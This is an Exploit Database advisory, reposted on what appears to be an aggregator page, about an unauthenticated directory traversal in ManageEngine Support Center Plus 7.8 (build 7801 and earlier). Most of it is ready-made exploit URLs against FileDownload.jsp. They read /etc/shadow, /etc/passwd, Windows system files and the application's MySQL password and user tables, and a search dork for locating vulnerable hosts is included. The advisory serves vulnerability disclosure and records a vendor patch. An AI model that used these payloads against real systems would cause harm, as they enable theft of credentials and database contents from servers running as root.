ManageEngine Support Center Plus 7.8 Build 7801 – Directory Traversal

• Exploit Database
• 36 阅读

• 作者： xistence
  日期： 2011-06-23
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/17442/

• Advisory:
  ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability
  
  Author:
  Robert 'xistence' van Hamburg - xistence<AT>0x90.nl
  
  Software link:
  http://www.manageengine.com/products/support-center/download.html
  
  Tested on:
  Linux & Windows
  
  Category:
  Directory Traversal
  
  Severity:
  High
  
  Google Dork: intitle:ManageEngine SupportCenter Plus
  
  Description:
  
  It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
  This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
  An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
  
  Requests Linux:
  
  Grab the /etc/passwd & /etc/shadow:
  
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=passwd&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&delete=false
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=shadow&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&delete=false
  
  In a default situation the databasename is "supportcenter" and so it's easy to retrieve the database files like this:
  
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fibdata1&delete=false
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile0&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile0&delete=false
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile1&delete=false
  
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaapassword.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaapassword.frm&delete=false
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaauser.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaauser.frm&delete=false
  
  
  Requests Windows:
  
  Hosts file:
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=hosts&module=Request&ID=1&path=..\..\..\..\..\..\Windows\system32\drivers\etc\hosts&delete=false
  
  Explorer.exe:
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=explorer.exe&module=Request&ID=1&path=..\..\..\..\..\..\Windows\explorer.exe&delete=false
  
  MySQL database ibdata1 file:
  http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..\..\mysql\data\ibdata1&delete=false
  
  
  Disclosure:
  - May 30 2011, vulnerability found
  - May 30 2011, contacted vendor (ManageEngine) about security issues
  - Jun 1 2011, vulnerability fixed by vendor (ManageEngine) and released as patch 7803